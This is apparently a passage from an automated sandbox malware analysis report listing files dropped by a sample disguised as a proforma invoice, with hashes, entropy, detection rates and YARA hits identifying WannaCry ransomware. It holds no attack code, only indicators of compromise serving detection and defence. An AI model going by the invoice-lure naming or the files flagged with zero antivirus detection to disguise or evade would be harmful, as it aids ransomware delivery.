                                                          Encrypted:false
                                                          SSDEEP:24:bkMMzlVxsr0+TJr5rJZWFG/TzvOTQkOIA4IT6wt5RzoO3cSlzFp1hqTUNW:bkHxDszTJr0DTZZIT6ehDp87
                                                          MD5:53F4D0846D513B6529FC9138FB359B23
                                                          SHA1:8058880E6DFB7A8BFFE3B3637E5D882A92FF3EB6
                                                          SHA-256:77CBA7BDE7D34A5B4F2D9C70464C843B0611A9855AD8FF0FEE17FF42272E046A
                                                          SHA-512:75EF50B2E457CE698A48606DF2F9391C2CDB8442D1B37D82E0E3763AAE8F3E3569D80EE84491BDCB485AA808F40023BC01FAB380D8A90F03630F91177A546136
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.832827341428288
                                                          Encrypted:false
                                                          SSDEEP:24:LcB6+1heTLyluXDqj8+6BRERf7VUiwEqa669monhywqEz:YK+j8vRnXEqaNbqEz
                                                          MD5:22C5A33A6BA983F132372BE3E55C3B26
                                                          SHA1:DF22B1B6D4541DD85954FECEC9EA0B83E74447DD
                                                          SHA-256:078E3F647D6BEC1E1329DC9C494D4FCE13E603DE522DF2321C05ED31FB7DB564
                                                          SHA-512:1ACB06345AC8333DC0E59B11A11AF47C9313CF7138F992E1C2743DD53ADB6A7FE537E5BF75F5D37BBD16391D08765ACAFC2E8EB2AE5837F655F2AA9391B87C5E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.8354128405562475
                                                          Encrypted:false
                                                          SSDEEP:24:bkUZtbYd5bTOJ5hisue1Hw1yLhBiB8999isHLdatHCrVEa4vuSqD6AM9g+h4dC:bkIw5X07yUok5993rdatHCJEJ/jd
                                                          MD5:5385B3F8039DAF3D353B1EB4AFD3DF75
                                                          SHA1:9131EAA564735D6B51B3290C3AD3BA6559A27D30
                                                          SHA-256:8F19F7008D89C86A834B06DD77BC12B5A2BC9A6124CCE0E335C2AD4AB0B279DE
                                                          SHA-512:B13D6D65455550DDBF7F36FBA8292B802E30A4E583E574C40897231FCC54C17F284CF20134234EBC8C1FF2A008A5596F0E8E3486C7611ED2F8ED30FE29E6EB25
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.800170893089835
                                                          Encrypted:false
                                                          SSDEEP:24:81Q8sVkZB5Vz5pCHarB1HfwkOnARJYAacvcebw3y4:4865VzrCKokOn/AacU+gy4
                                                          MD5:2C3442A044ED4AA75DC7924D86A37B75
                                                          SHA1:2A6BBF1213535BED1A8E986472BA262B571C7363
                                                          SHA-256:084D86FFB46B1E141D373F3BFF0892AA8A748E6E4A8EA05A513075B7D17DE86A
                                                          SHA-512:2D1024D0D5EA482764F30B9F52D3A570A455FA3C2D779FD0A1F84DF18EE3F193742302919E539C3F3D39E3F0FE6D1A6B35CBA43D47716D24E7DC5ABD98885646
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.8515949690114635
                                                          Encrypted:false
                                                          SSDEEP:24:bk/wHdrsu2A46cPANtPO5vifjgqauOMh/jIPiX5cFtRtvqJML4BUfuIvLs286B5v:bk/w9rshbQvPOBYkqaKhbIPKKFtLqJ5Y
                                                          MD5:972D08CBBC609A6C47F32572BF14B070
                                                          SHA1:BE6284C7FD0FB9D79CD0FF0217B51EA890BDE47D
                                                          SHA-256:FC63B3FAAE76C4C6AEEFB4E1DC7B5276909BBF6A1EBAEA50D7F8E5219729F0B9
                                                          SHA-512:83C5E1597C711890327D1716DD9A8D501383A9546A36EF67FB5F7968742174DCEB16035275A748047E8B8205BEF3F38FFE3F1A807D3C23A6C63BCAF235151CB9
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.826689884175093
                                                          Encrypted:false
                                                          SSDEEP:24:RBCrT1s5KyOgAGnQq+6AdsNtQ+OXrZzfwzwhE4N9v2vQTiO01ymnYjvy+:nCKOTtqvAAt4hQw3N9vqi08/
                                                          MD5:FFBFA8DAF53DAC951942B5C6CAF2B4C0
                                                          SHA1:AA60CACA2F4C8C1930A568E90FB0335B65871AF0
                                                          SHA-256:A3DE99F7899D785533F74E70F868A19919EB778418B5686C3E9B6C2119E80607
                                                          SHA-512:454F45AE5F0CA8A322EACA0629EE21FE5FB2F15B41F77E5B611B99E730623C6CCCEC7438E6ABA3E512ABF00BAEFD3F91B8DD79D10B323E00C9CB89EA206AA987
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.836252345240981
                                                          Encrypted:false
                                                          SSDEEP:24:bkEuMt7lUAa3X17/k8nd1whR7o/bQyooSUn9sdCmSqscFi0hRxqNdSaR8sOIp+WI:bkvMt2P17/k8d1whR8tSlCmHsco2ELSv
                                                          MD5:249CF9FE9D9E6F0CFB75D61287523546
                                                          SHA1:BDD8546230DA9DDE38FFF34EABCA0FD7759D8A0E
                                                          SHA-256:2A296D1EC5CD379857FE91327A8F0347D7E91C7FE9E6F703F2D1621853C75719
                                                          SHA-512:0B98BB8F49B51F6BB24D11DC6C5C2D299BB4CCD0FD45B51323F48C5BF95A4212DDD91E8FC2EC3ED90F207EF3CB89FE44990D7186F70629ECDBE7676A6C008D78
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.799256142770332
                                                          Encrypted:false
                                                          SSDEEP:24:0kWuY2ybj8Y3DOmGr1hUWQc6z80pFy5JAJ/B04dgcxbGNX:7Wd2ybgY39Gr1hVQc6z80rH5LmXX
                                                          MD5:D60D2F2C620165F621033B8BC6971117
                                                          SHA1:C60EF1D039A4CE047D1B1F9F6FC664B32C24E6EA
                                                          SHA-256:AE71F895DA3E7E44779B9EB73F5A7F204DDF6578D91D7032817E059EE581DACF
                                                          SHA-512:AFDB580D4B694EE6E5C60A2B623860F40BEA2F6FFDFBCE6D54F666A9A3BB702A1882DF434AB85280653EDE0943D3F4BDCB32FF554D38003314E0ABCA88E2DB70
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.859521653126108
                                                          Encrypted:false
                                                          SSDEEP:24:bkcK3bCxklEGGCma2YAAChwJr/znmFMESg1AdSdPm2l2IDwOWjv7z/:bkcK3bxEGGF6ChwzcbZ9m2lzW7
                                                          MD5:D20003373C9A5ADE1DD6AA364F0FB2FC
                                                          SHA1:8FAE0663695213BA704DB8E43AE8377D6359467E
                                                          SHA-256:D21F5989EEF5D02091A2E6E0B6CEAD12CE3F27FB394C3CCB09BF4C9A0EFCBC8E
                                                          SHA-512:9A17DBEAA52210FD71884FF3923628E115B99EB6F921ACE7D32DA7DCDB718D9A41B4036C0FACC49CC16C5E3482CCCA2BC1B203E6CF0FB1F0B64357466BD88D47
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Program Files\7-Zip\7zG.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3514368
                                                          Entropy (8bit):7.995470941164686
                                                          Encrypted:true
                                                          SSDEEP:98304:QqPoBhz1aRxcSUDk36SAEdhvxWa9P593R8yAVp2g3x:QqPe1Cxcxk3ZAEUadzR8yc4gB
                                                          MD5:84C82835A5D21BBCF75A61706D8AB549
                                                          SHA1:5FF465AFAABCBF0150D1A3AB2C2E74F3A4426467
                                                          SHA-256:ED01EBFBC9EB5BBEA545AF4D01BF5F1071661840480439C6E5BABE8E080E41AA
                                                          SHA-512:90723A50C20BA3643D625595FD6BE8DCF88D70FF7F4B4719A88F055D5B3149A4231018EA30D375171507A147E59F73478C0C27948590794554D031E7D54B7244
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Author: Joe Security
                                                          • Rule: WannaCry_Ransomware, Description: Detects WannaCry Ransomware, Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Author: Florian Roth (with the help of binar.ly)
                                                          • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Author: us-cert code analysis team
                                                          • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Author: ReversingLabs
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 92%
                                                          • Antivirus: Virustotal, Detection: 94%, Browse
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.81091196419637
                                                          Encrypted:false
                                                          SSDEEP:24:Uwpprt1zcjKaUJm2DC1FjrC2STS/fbPMPSQcwl5nP1tqQ:LnXzcjKZJCjrkW/Thcl5nOQ
                                                          MD5:7CAD906B0D5397918D3AB4D24830FD1D
                                                          SHA1:6C424B4D3DC3034ABA5D009DCD7684560878268A
                                                          SHA-256:F018225FE533F712CECBE76AC1ACBC7700E9EFECF70E51A468B633B00B2DA030
                                                          SHA-512:4A53E3B1E043430BD567D00980F9A6E9B59B0C6F8D5DA3357A4132971D376767660CD6D9803634F1C9E1900AFA3BABFFCF03D13C7F8C6E865D4580C8122315B6
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.888896736618122
                                                          Encrypted:false
                                                          SSDEEP:24:bkyA2SW3tC2fHYTUjcKHGn1akQ1yOshK+vy6W1mwGKplDYSnUYvLo60I5t/X:bkEtCaH2UIKm1af18hLvyHpSSnUY2I5N
                                                          MD5:9A7C68678B9228931F06C63EF0B82F52
                                                          SHA1:9BFDD274F8A73827500853C04D2638026E4A3557
                                                          SHA-256:C1F8BEF858F750819D60E6C74D4AD6484B13E77CE8BFE45F2FD086062D7F4F06
                                                          SHA-512:2FD3CC63CB96448D34CB18A6D00663D4CF7CC1C5C6DCB2E0BA286C69CC11558F9E1A8CC6B27A390B41FD651863A2B6DBB2906B2301E6B0B5EAE5C59AC675E7C7
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.823621733972832
                                                          Encrypted:false
                                                          SSDEEP:24:ePo4IvUVkN55OzXPS2IoB1KhXc+JUIz8YHLTHzGxCFTzYtkSmci:eQdsECzlIoyLUIz8YfHycFfCC
                                                          MD5:10639254F86E54A742C5D70140269FAA
                                                          SHA1:FA2E48766E43250DCC8D030FE9E2D7424087A759
                                                          SHA-256:AE79E37584FF86A9D1A01F70D76B03A897FB38D57F911757A4BF16C4883D5542
                                                          SHA-512:F08863AEA3A548EF42150ECCB9096CA6E4FFCB143F0BDAA5B410F9E5309F2E5E1ECF29D6195B7142BA990515D0CF8C230D68C59A8350033B2472B9D8607669B7
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.838150553233862
                                                          Encrypted:false
                                                          SSDEEP:24:bkVztUGPxsJUZBuzBrxUcL5z03lym+ikl7QWTvOFGA6MrwvIGuJ5zDKgTQ:bkQyZB6rSI5zOlym+/rW41Irot
                                                          MD5:3C038B8D9CFFACCD0BCC443C40F2BCDD
                                                          SHA1:BB0B9E9AE7BE8B5863EDEF09CEF4C578EAA84B9D
                                                          SHA-256:BED9564E46D28C7833B40FB4EB51564783D8688E3FCCCCE76D2500C34F0A34BC
                                                          SHA-512:A12A2F8CCF9D8F603714ADBFD426A864E2690F11F884957CE4E92B153225835C592207F544801C5D2BA79AD711AF11618CB202FD6ADBECCC699DB23C350464D8
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Program Files\7-Zip\7zG.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):3481559
                                                          Entropy (8bit):7.999312423782288
                                                          Encrypted:true
                                                          SSDEEP:49152:jymCheymCheymCheymCheymCheymCheymCheymCheymCheymCheymCheymCheymG:+RHRHRHRHRHRHRHRHRHRHRHRHRH9
                                                          MD5:49B0330BEA9FA76157EA17D10930F2B6
                                                          SHA1:7C9D77094744DEEB044BBC70266C3018AE90CF6B
                                                          SHA-256:2F4B69E9EDB6CDC88EF78E5511C251F98AA2188FCB334F65C27B543FE464D253
                                                          SHA-512:E83A091BD2F35E1ACC68F4A499F6D4D617ED58C6BF6BE91622F74F9397675FE4F85579FF53B28C9723C0150631821F8B2BC50B3E6C71CE36098CA778E858C33B
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):3481848
                                                          Entropy (8bit):7.999953777022837
                                                          Encrypted:true
                                                          SSDEEP:49152:lW5Qjb+aV9n68KgCgT7ytENfQdp2FHAhmUCpLSbnMc3k+hnWkOIfAaW:lPjbh9mGuDMFgkUvx3vhQILW
                                                          MD5:FDD5DAE54672529FFF613D8938FE2840
                                                          SHA1:E1343970798E0C801BD0354C6434FE37E6E2228C
                                                          SHA-256:24AC417F3A7C656F76AB3E1210F933F76E78D06A4497B3AE5FA23BC0A93BE7FD
                                                          SHA-512:87E3BF254246C02368D3C5A48FC225A34FC5E35BD44A0BCCE350D52DBF11383E77CC413E3B95CF7DE0DCE2898B860C6EAF710070C62A199C5D1335779FDA2DF8
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):3482858
                                                          Entropy (8bit):7.99937050113591
                                                          Encrypted:true
                                                          SSDEEP:49152:8SQeqSQeqSQeqSQeqSQeqSQeqSQeqSQeqSQeqSQeqSQeqSQeqSQel:T
                                                          MD5:BF9DEF5B84E6E02842CCD723DF557D3F
                                                          SHA1:686EF48213DA663416924DF6A5DACE96512F5AF7
                                                          SHA-256:300D4941CABBDEDAF918D1910A47E98CD73419958C7DBAEE0AC671326E738779
                                                          SHA-512:96B4156B94C9234EFA7058A83FBE653722C384D6036AA98FD5D89A1C3C4884A810C9349DD088103965360E98B8B6BE89DCEA04549CB7EACCC4FE3C669A07BBC6
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):3483144
                                                          Entropy (8bit):7.999949139738267
                                                          Encrypted:true
                                                          SSDEEP:49152:Wc/+YWHNr3YvRfnPRx6OSHGK9/yc3YdMHJKAL6iXtmLvlO5ZMzzUB0rnrI9cLDe:Wc/+/NURxDKhN3YoJ3eiXgLNOD+fTra
                                                          MD5:6A18852DDF3F0422793AC24A6E8179EF
                                                          SHA1:E5C986206E05D697853386BA93A92CE2097580A2
                                                          SHA-256:CF1D5F6D95CECC13B48992173E192AAB98E1CD8F9C084AC2DB80C0CAEB91B22D
                                                          SHA-512:7F6F61006FD1781BDF6EC49B3AF766453C676366C469D65B20918B9538AA3E9D17392895643A0CA5E8BAB4484128D3196CAE93BD3D7D0A47571A831F927BA069
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3197106
                                                          Entropy (8bit):6.130063064844696
                                                          Encrypted:false
                                                          SSDEEP:98304:W5FYc9YouOquJVqrR1LlZRUT83DlJrqd+kq:WrjYouOquJgrlZ283xFqdq
                                                          MD5:6ED47014C3BB259874D673FB3EAEDC85
                                                          SHA1:C9B29BA7E8A97729C46143CC59332D7A7E9C1AD8
                                                          SHA-256:58BE53D5012B3F45C1CA6F4897BECE4773EFBE1CCBF0BE460061C183EE14CA19
                                                          SHA-512:3BC462D21BC762F6EEC3D23BB57E2BAF532807AB8B46FAB1FE38A841E5FDE81ED446E5305A78AD0D513D85419E6EC8C4B54985DA1D6B198ACB793230AEECD93E
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):719217
                                                          Entropy (8bit):5.981438230537172
                                                          Encrypted:false
                                                          SSDEEP:6144:Ir2r5rFriGKbgai112Yq/5hcQTcGzAHzSHeqoftOEEdD4B2pihSpKOKm:naiV25uQTcGzAHOEW+Pzm
                                                          MD5:90F50A285EFA5DD9C7FDDCE786BDEF25
                                                          SHA1:54213DA21542E11D656BB65DB724105AFE8BE688
                                                          SHA-256:77A250E81FDAF9A075B1244A9434C30BF449012C9B647B265FA81A7B0DB2513F
                                                          SHA-512:746422BE51031CFA44DD9A6F3569306C34BBE8ABF9D2BD1DF139D9C938D0CBA095C0E05222FD08C8B6DEAEBEF5D3F87569B08FB3261A2D123D983517FB9F43AE
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):417759
                                                          Entropy (8bit):5.853358941151938
                                                          Encrypted:false
                                                          SSDEEP:6144:g8r2rQrFr0XGXnZ7rvzRsiWqnjmYl5oHIH9A:gtXGJnvmiggA
                                                          MD5:E5DF3824F2FCAD0C75FD601FCF37EE70
                                                          SHA1:902418A4C5F3684DBA5E3246DE8C4E21C92D674E
                                                          SHA-256:5CD126B4F8C77BDF0C5C980761A9C84411586951122131F13B0640DB83F792D8
                                                          SHA-512:7E70889B46B54175C6BADA7F042F5730CA7E3D156F7B6711FDF453911E4F78D64A2A8769EB8F0E33E826A3B30E623B3CD4DAF899D9D74888BB3051F08CF34461
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):411369
                                                          Entropy (8bit):5.909395689751269
                                                          Encrypted:false
                                                          SSDEEP:3072:oLQzG3CaDYuKCsZW9p2M8suCOSNKOM0LE5BtBsxvQkVgA2+FOYtLEgZEVPSm0aQY:oWHMACLoYaQ2bj+b0pJ
                                                          MD5:6D6602388AB232CA9E8633462E683739
                                                          SHA1:41072CC983568D8FEEB3E18C4B74440E9D44019A
                                                          SHA-256:957D58061A42CA343064EC5FB0397950F52AEDF0594A18867D1339D5FBB12E7E
                                                          SHA-512:B37BF121EA20FFC16AF040F8797C47FA8588834BC8A8115B45DB23EE5BFBEBCD1E226E9ACAB67B5EE43629A255FEA2CEEE4B3215332DD4127F187EE10244F1C3
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):523262
                                                          Entropy (8bit):5.7796587531390795
                                                          Encrypted:false
                                                          SSDEEP:6144:+ymz8Jq1p95avGpuO+/jUE8ADu2kNBMY8KHNygoB0+6tMqSsVwvN:+ylSZ+/jU7ynIK5Bb6Y
                                                          MD5:73D4823075762EE2837950726BAA2AF9
                                                          SHA1:EBCE3532ED94AD1DF43696632AB8CF8DA8B9E221
                                                          SHA-256:9AECCF88253D4557A90793E22414868053CAAAB325842C0D7ACB0365E88CD53B
                                                          SHA-512:8F4A65BD35ED69F331769AAF7505F76DD3C64F3FA05CF01D83431EC93A7B1331F3C818AC7008E65B6F1278D7E365ED5940C8C6B8502E77595E112F1FACA558B5
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):92599
                                                          Entropy (8bit):5.351249974009154
                                                          Encrypted:false
                                                          SSDEEP:1536:pEiL38qIuOFcErNX5d0tRCZiBP2DrbjgpfM2ydbv:aiLsqIHFPpdiU2q
                                                          MD5:78581E243E2B41B17452DA8D0B5B2A48
                                                          SHA1:EAEFB59C31CF07E60A98AF48C5348759586A61BB
                                                          SHA-256:F28CAEBE9BC6AA5A72635ACB4F0E24500494E306D8E8B2279E7930981281683F
                                                          SHA-512:332098113CE3F75CB20DC6E09F0D7BA03F13F5E26512D9F3BEE3042C51FBB01A5E4426C5E9A5308F7F805B084EFC94C28FC9426CE73AB8DFEE16AB39B3EFE02A
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):711459
                                                          Entropy (8bit):5.884120014912355
                                                          Encrypted:false
                                                          SSDEEP:12288:hXhKnXI0Fkw80VEJtzwIA6Ouah6ESyrWlp36Z:thKnnkw80VEJtzwIAiazSxlFw
                                                          MD5:A12C2040F6FDDD34E7ACB42F18DD6BDC
                                                          SHA1:D7DB49F1A9870A4F52E1F31812938FDEA89E9444
                                                          SHA-256:BD70BA598316980833F78B05F7EEAEF3E0F811A7C64196BF80901D155CB647C1
                                                          SHA-512:FBE0970BCDFAA23AF624DAAD9917A030D8F0B10D38D3E9C7808A9FBC02912EE9DAED293DBDEA87AA90DC74470BC9B89CB6F2FE002393ECDA7B565307FFB7EC00
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3098624
                                                          Entropy (8bit):6.512654975680739
                                                          Encrypted:false
                                                          SSDEEP:49152:5m9/gUvHrLaQ4Dt4PC+3xhae2cQX7E5zNvQIJZW/1h4+o4:MiuLSDt2C+3baAQX7ETQIr+h4+o
                                                          MD5:FE7EB54691AD6E6AF77F8A9A0B6DE26D
                                                          SHA1:53912D33BEC3375153B7E4E68B78D66DAB62671A
                                                          SHA-256:E48673680746FBE027E8982F62A83C298D6FB46AD9243DE8E79B7E5A24DCD4EB
                                                          SHA-512:8AC6DC5BB016AFC869FCBB713F6A14D3692E866B94F4F1EE83B09A7506A8CB58768BD47E081CF6E97B2DACF9F9A6A8CA240D7D20D0B67DBD33238CC861DEAE8F
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):107520
                                                          Entropy (8bit):6.440165833134522
                                                          Encrypted:false
                                                          SSDEEP:1536:NlN3sTKU7xniaO9ADje81EQ3aL8WNdUCqfRnToIfBoIONIOqbW+xCvETe:DpsmU7xaiDjeJL5qf5TBfgHqbdxCv6e
                                                          MD5:FB072E9F69AFDB57179F59B512F828A4
                                                          SHA1:FE71B70173E46EE4E3796DB9139F77DC32D2F846
                                                          SHA-256:66D653397CBB2DBB397EB8421218E2C126B359A3B0DECC0F31E297DF099E1383
                                                          SHA-512:9D157FECE0DC18AFE30097D9C4178AE147CC9D465A6F1D35778E1BFF1EFCA4734DD096E95D35FAEA32DA8D8B4560382338BA9C6C40F29047F1CC0954B27C64F8
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.781903416547841
                                                          Encrypted:false
                                                          SSDEEP:24:NJwF4RCj5CFxuZH/0DKgOIyN6QPjkjxq+hUka/BZ3wg4H5:s6aCFEx/0DKkydkjxJG5igO
                                                          MD5:138921DC4C06A0C0D51DE9C1E2D18DDD
                                                          SHA1:58F0ACCE36B48CB588BD58F8D8D6CEC44E44AA43
                                                          SHA-256:729533A90737FF489AA8202EF7261C09FA508976E8AFE50C664710B60401EDAC
                                                          SHA-512:D064454BFC605C39D78C1AD784EB4EE28C4399FF3B5443C7B4E571FC329ADAC87C350B09BB6D88311245E8735326651A6E71BA47D3A688D1B12976340012A4A0
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.826346487415205
                                                          Encrypted:false
                                                          SSDEEP:24:bkkMeLwH8mUVieD4tpRqWUlIfuE0ppv1qRyQva7jzACjQniGwc8nKMTCgXDOHQ:bk7bUceD4boAuZrvIRyQvSjzA6Qi7c8D
                                                          MD5:1386AB54FD58EEE01E84A21D3A65EC60
                                                          SHA1:23261A6A3C5BF7D7DA2DAE535898C8246319D533
                                                          SHA-256:7D6230A3C1DCBEE56AAE93893E19A8A8AA33F34018660562567EA5C38AA8A230
                                                          SHA-512:2397EC58730AD63D0C7F423C8D3B06BC1236E8F676E9D0C8A20CE118387EC0296FDEE8952F6BD87A98641851B7F56BD59AA5180A158F6F03E9C70F6EFD870768
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:OpenPGP Secret Key
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.822260955936933
                                                          Encrypted:false
                                                          SSDEEP:24:HPGS449pt+NJyiboBS25pudmcNi4iXiokyDHcvfxh3Yxxv:v5Npt+2iboBS4Emcn9vfxhYx9
                                                          MD5:70FA554C53C2C424249803CB46D85B9B
                                                          SHA1:823E10932676820CBB1BE60ABCC49697DF810618
                                                          SHA-256:B9859F7E32BA78D82CA907ED5A2AA6AFB6E051D52E85FEBCF8561C8C091DA7DB
                                                          SHA-512:79CDBA0D506328AD62DE24231D4B035C73ADDEFDB1ED938FF7C1857B62738F42185565B1260E89C5755BB6F8ED674267BCC7562BD9157F8F1A09730CCA97A663
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.861894575548728
                                                          Encrypted:false
                                                          SSDEEP:24:bkgRXSVpBSzKD7Uk96smCZOV5I4jcfIfVpi1kZmv69lxgSXCwuMNRnIMswJJ:bkgRIr6QQk96p5vXjGZ1P6DWSSwuMNRX
                                                          MD5:0E7914D4B15FDDE9D81FD03C6788AFEF
                                                          SHA1:2AFFCEDE5DBA2921F534666B1CF5155D75237DEA
